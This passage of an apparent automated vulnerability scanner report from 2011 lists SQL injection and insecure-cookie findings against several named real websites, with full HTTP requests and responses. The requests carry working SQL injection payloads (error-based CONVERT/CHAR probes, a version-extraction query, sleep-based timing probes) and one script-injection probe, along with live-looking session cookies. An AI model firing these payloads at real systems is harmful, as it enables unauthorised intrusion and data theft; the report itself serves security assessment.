Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 14:28:11 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700483469:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 1983

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=103&bglt=F2F4F6&bgmd=FFFFFF&bgdk=737A82
...[SNIP]...
11.2. https://checkout.netsuite.com/core/styles/pagestyles.nl  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://checkout.netsuite.com
Path:   /core/styles/pagestyles.nl

Request

GET /core/styles/pagestyles.nl?ct=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=pbWBN1GZpsFMMPGgD9fLtR1NsNxGljmTjF8P6kCVL9tLVKlFGB6qxvrttG2GmQHnFDK4npSP202Q0Q5SDBy6smMPTW80GnM5p2KvFCT1Xnpb36YTfw4s4JZlBHvMLJsr!1726784262; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:09 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:09 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:09 GMT
NS_RTIMER_COMPOSITE: 777140821:616363742D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 69389

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...
11.3. https://checkout.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://checkout.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Request

GET /pages/portal/page_not_found.jsp?internal=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://checkout.netsuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 791381320:616363742D6A6176613034382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2p9QN1GJ2Z3S12xNCxQXlL1Sv9knyGTvcHGHKQhgRRLQvyzhppkLn91h0g3vBgYBjvYSZNXQykRX2kdnyQtQ3vxTgnKhjWyvZHZrDRvvmfT79J0vzSz4Lp1DGswvblyw!-1046013267; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320


<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...
11.4. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://checkout.netsuite.com
Path:   /s.nl

Request

GET /s.nl?c=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&sc=4&whence=3&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Location: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 339

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://checkout.netsuite.com/page
...[SNIP]...
11.5. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Cookie: ASPSESSIONIDSSRCBTSB=CEAKPIJCCMCNNEOHIFEHAOEN; KTMDWestLB=1211368202.20736.0000; ASPSESSIONIDSSRADQTB=BCMNMKJCKPMBDHCEEMCKNLDG; Emp=datpwx=&UN=u662%3A%2F%2F0r652n4xr4%2Ep1z%2F0&SkipSSL=&PT=&CNAME=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 201

image1=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&txtPassword=3&txtUsername=Smith

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Content-Length: 3924
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=fzv6u&SkipSSL=&PT=&CNAME=UnicruEmployer&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=; path=/
Cache-control: private


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...
11.6. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Request

GET /hmc/report/?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
11.7. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Request

GET /hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
11.8. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                                           
...[SNIP]...
11.9. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 119

btnCancel=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&btnSubmit=Submit&txtEmail=netsparker%40example.com

Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check
...[SNIP]...
11.10. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://support.trust-guard.com
Path:   /index.php

Request

GET /index.php?_m=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&_a=submit HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:00:50 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 126

<br />
<b>Fatal error</b>: in <b>/homepages/9/d212015129/htdocs/support/includes/functions.php</b> on line <b>867</b><br />
11.11. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Request

GET /visitor/index.php?_m=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&_a=htmlcode&departmentid=0&fullname=Smith&email=netsparker@example.com HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:07:38 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 126

<br />
<b>Fatal error</b>: in <b>/homepages/9/d212015129/htdocs/support/includes/functions.php</b> on line <b>867</b><br />
12. SSL cookie without secure flag set  previous  next
There are 38 instances of this issue:

12.1. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144347290:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.2. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000683563:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.3. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:10:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110553779:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.4. https://checkout.netsuite.com/core/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /core/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000013)%3C%2Fscript%3E HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=31PwN1GWQvkMGP2pxGGpgHN2m48g811ybT9HCcv4R2jvLCt8R9y21ywBzs7v4v6KSnRPhyDpZb218XYJ9jkhnLpJpr8m7pxCsyyXnPNz1ChxGGXdMyLzThLVm6jGBpVG!1490567172; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333241087:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2650


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
12.5. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:12 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368749109:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.6. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
